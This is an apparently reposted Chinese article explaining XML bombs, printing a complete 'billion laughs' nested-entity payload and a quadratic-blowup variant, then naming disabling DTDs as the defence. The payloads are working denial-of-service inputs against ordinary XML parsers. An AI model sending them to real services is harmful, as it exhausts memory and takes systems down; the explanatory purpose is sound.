XML炸彈

時間 2019-11-05

標籤 xml 炸彈欄目 XML 简体版

原文原文鏈接

XML炸彈
XML document type definition (DTD)能夠定義entity，DTD能夠出如今外部文件或文件內部。
利用DTD能夠產生XML炸彈，也就是能迅速佔用大量內存的文件，以下爲例：
當XML解析器嘗試解析該文件時，因爲DTD的定義指數級展開，這個1K不到的文件會佔用到3G的內存。spa

 
         <?xml version= 
         "1.0" 
         ?> 
        
         <!DOCTYPE lolz [ 
        
         <!ENTITY lol  
         "lol" 
         > 
        
         <!ENTITY lol2  
         "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;" 
         > 
        
         <!ENTITY lol3  
         "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;" 
         > 
        
         <!ENTITY lol4  
         "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;" 
         > 
        
         <!ENTITY lol5  
         "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;" 
         > 
        
         <!ENTITY lol6  
         "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;" 
         > 
        
         <!ENTITY lol7  
         "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;" 
         > 
        
         <!ENTITY lol8  
         "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;" 
         > 
        
         <!ENTITY lol9  
         "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;" 
         > 
        
         ]> 
        
         <lolz>&lol9;</lolz>

還有一種，雖然擴展率沒那麼大，也頗有效。200K的可以擴展到2.5G。code

 
         <?xml version= 
         "1.0" 
         ?> 
        
         <!DOCTYPE kaboom [ 
        
         <!ENTITY a  
         "aaaaaaaaaaaaaaaaaa..." 
         > 
        
         ]> 
        
         <kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>

防護XML炸彈
禁止DTDxml

1. 【Unity2DMobileGame06】—— 製作炸彈以及炸彈的爆炸效果
2. P5025 [SNOI2017]炸彈
3. 炸彈人
4. 引爆炸彈
5. bzoj5017 [Snoi2017]炸彈
6. 時間炸彈
7. [Snoi2017]炸彈
8. 星系炸彈
9. shell炸彈
10. 【dfs】引爆炸彈
更多相關文章...
• jQuery Mobile 彈窗 - jQuery Mobile 教程
• XML - E4X - XML 教程
• TiDB 在摩拜單車在線數據業務的應用和實踐
• NewSQL-TiDB相關

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。